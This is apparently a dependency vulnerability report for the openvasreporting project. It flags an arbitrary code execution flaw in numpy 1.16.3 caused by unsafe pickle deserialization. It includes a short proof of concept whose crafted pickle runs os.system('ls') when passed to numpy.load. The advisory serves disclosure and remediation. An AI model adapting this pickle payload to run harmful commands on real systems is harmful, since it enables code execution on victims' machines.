TheGroundZero/openvasreporting

Vulnerabilities 1 via 2 paths
Dependencies 11
Source GitHub
Commit ca74209f

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0
high severity

Arbitrary Code Execution

  • Vulnerable module: numpy
  • Introduced through: numpy@1.16.3 and matplotlib@3.1.0

Detailed paths

  • Introduced through: TheGroundZero/openvasreporting@TheGroundZero/openvasreporting#ca74209fb426fc5d21e5c13a2bdb994895f45cfc numpy@1.16.3
  • Introduced through: TheGroundZero/openvasreporting@TheGroundZero/openvasreporting#ca74209fb426fc5d21e5c13a2bdb994895f45cfc matplotlib@3.1.0 numpy@1.16.3

Overview

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print __version__
import os
import  pickle
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f:
    pickle.dump(tmpdaa,f)
numpy.load('a-file.pickle')

Remediation

There is no fixed version for numpy.

References